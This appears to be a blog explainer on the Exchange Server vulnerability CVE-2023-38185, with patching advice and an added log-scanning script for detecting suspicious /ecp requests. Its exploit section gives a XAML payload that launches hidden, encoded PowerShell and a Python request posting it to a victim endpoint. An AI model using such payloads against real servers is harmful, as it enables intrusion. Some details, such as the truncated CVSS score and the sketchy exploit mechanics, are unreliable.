---
If you manage a Microsoft Exchange Server, you know they're vital to business communications—but they're also highly targeted by hackers. In August 2023, Microsoft disclosed a troubling flaw: CVE-2023-38185, a Remote Code Execution (RCE) vulnerability that put thousands of organizations worldwide at risk. In this article, we take a deep dive, including a simplified explanation, code snippet, exploit details, and recommended defenses.
What Is CVE-2023-38185?
CVE-2023-38185 is a security bug discovered in Microsoft Exchange Server 2016 and 2019. With a CVSS base score of 8. (High Severity), the flaw allows attackers with network access to launch code on the server remotely, without user interaction or valid credentials. In plainer terms: a hacker could take over your mail server just by sending malicious requests.
Official Reference
- Microsoft Security Update Guide – CVE-2023-38185
How Does The Vulnerability Work?
Microsoft Exchange Server exposes several web services, like Outlook Web Access (OWA), that listen to public ports. The vulnerability lies in how Exchange handles certain deserialization operations. By sending specially crafted requests, an attacker can coerce the server into running arbitrary code.
The actual bug is deep in the way Exchange deserializes PowerShell workflow XAML files—content that shouldn't be accepted from user-provided data. If XAML references are malicious, they get executed with the privileges of the Exchange server.
In short: The server will "run" what the attacker sends it!
Exploit Details (Simplified)
WARNING: This is for educational purposes only. Do not attack systems without permission.
Step 1: Identify a Vulnerable Endpoint
Exchange exposes various URLs. For this bug, the endpoint involves /ecp (Exchange Control Panel).
For example:
https://exchange-victim.com/ecp/default.aspx
Step 2: Crafting The Malicious Request
An attacker crafts a serialized workflow XAML file containing dangerous .NET code, like spawning a reverse shell or executing system commands.
Here's a conceptual snippet, in pseudo-code, of the serialized payload:

```xml
<Activity xmlns="http://schemas.microsoft.com/netfx/2009/xaml/activities">
<x:Members>
<x:Property Name="Exploit" Type="InArgument(x:String)" />
</x:Members>
<Sequence>
<!-- Malicious PowerShell Command -->
<InvokeMethod TargetType="System.Diagnostics.Process" MethodName="Start">
<InArgument>
cmd /c powershell -NoP -NonI -W Hidden -EncodedCommand [PAYLOAD]
</InArgument>
</InvokeMethod>
</Sequence>
</Activity>
```
Attackers would encode this payload using a serialization tool, then send it as part of a POST request to a specific Exchange endpoint.
Step 3: Sending the Exploit
A legitimate user’s cookie or authentication might not even be needed depending on the endpoint’s access policy! Using curl or Python’s requests library, the attacker sends the serialized payload:
```python
import requests
url = "https://exchange-victim.com/ecp/default.aspx"
headers = {"Content-Type": "application/xaml+xml"}
payload = """PUT THE MALICIOUS XAML HERE"""
response = requests.post(url, data=payload, headers=headers)
print(response.status_code)
```
If the server is vulnerable, the payload executes!
What Could Go Wrong?
Ransomware, backdoors, stolen emails, companywide breaches. Exploiting this bug gives attackers a home base inside your network.
1. Patch Immediately: Microsoft fixed this in August 2023.
- Direct link to Exchange Cumulative Updates
2. Monitor For Exploitation: Look for unusual requests to /ecp.
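One way to turn the "monitor /ecp" advice into a concrete check, as an added example that is not part of the original post and not Microsoft code: scan IIS W3C logs for POST requests to /ecp that come from an anonymous session or a scripted client such as python-requests or curl (the tooling the exploit section mentions). The log lines are constructed samples, and the default IIS field order is an assumption about your logging configuration.

```python
"""Flag suspicious POST requests to /ecp in IIS W3C logs (added example)."""
from collections import Counter

# Constructed sample lines; default IIS W3C field order is assumed.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-08-09 10:01:02 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 120
2023-08-09 10:01:05 10.0.0.5 POST /ecp/default.aspx - 443 CONTOSO\\alice 10.0.0.44 Mozilla/5.0 https://mail.example.test/ecp/ 200 0 0 310
2023-08-09 10:02:11 10.0.0.5 POST /ecp/default.aspx - 443 - 198.51.100.23 python-requests/2.31.0 - 500 0 0 95
2023-08-09 10:02:12 10.0.0.5 POST /ecp/default.aspx - 443 - 198.51.100.23 python-requests/2.31.0 - 500 0 0 88
2023-08-09 10:02:13 10.0.0.5 POST /ecp/default.aspx - 443 - 198.51.100.23 curl/8.1.2 - 200 0 0 412
"""

# User-Agent prefixes typical of scripted tooling rather than a browser or Outlook.
SCRIPTED_AGENTS = ("python-requests", "curl/", "go-http-client")

def parse_w3c(text):
    """Yield one dict per log line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):   # skip malformed or truncated lines
            yield dict(zip(fields, values))

def is_suspicious(rec):
    """POST to /ecp/* from an anonymous session or a scripted client."""
    if rec["cs-method"] != "POST" or not rec["cs-uri-stem"].lower().startswith("/ecp/"):
        return False
    anonymous = rec["cs-username"] == "-"
    scripted = rec["cs(User-Agent)"].lower().startswith(SCRIPTED_AGENTS)
    return anonymous or scripted

def suspicious_sources(text):
    """Return {client_ip: count} of suspicious /ecp POSTs, for triage."""
    return Counter(r["c-ip"] for r in parse_w3c(text) if is_suspicious(r))

if __name__ == "__main__":
    for ip, n in suspicious_sources(SAMPLE_LOG).most_common():
        print(f"{ip}: {n} suspicious POST(s) to /ecp")
```

Authenticated browser traffic to /ecp (the CONTOSO\alice line) is left alone; only the anonymous scripted source is reported, which keeps the alert volume low enough to triage on a busy server.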
Conclusion
CVE-2023-38185 is a textbook example of why keeping Exchange servers patched is critical. Attackers jumped on this vulnerability soon after disclosure—don’t let your infrastructure be an easy target.
Resources & More Reading
- Microsoft Guide - CVE-2023-38185
- Exchange Team Blog: August 2023 Security Updates
- Community write-up/poc (when available)
Timeline
Published on: 08/08/2023 18:15:00 UTC
Last modified on: 08/10/2023 21:15:00 UTC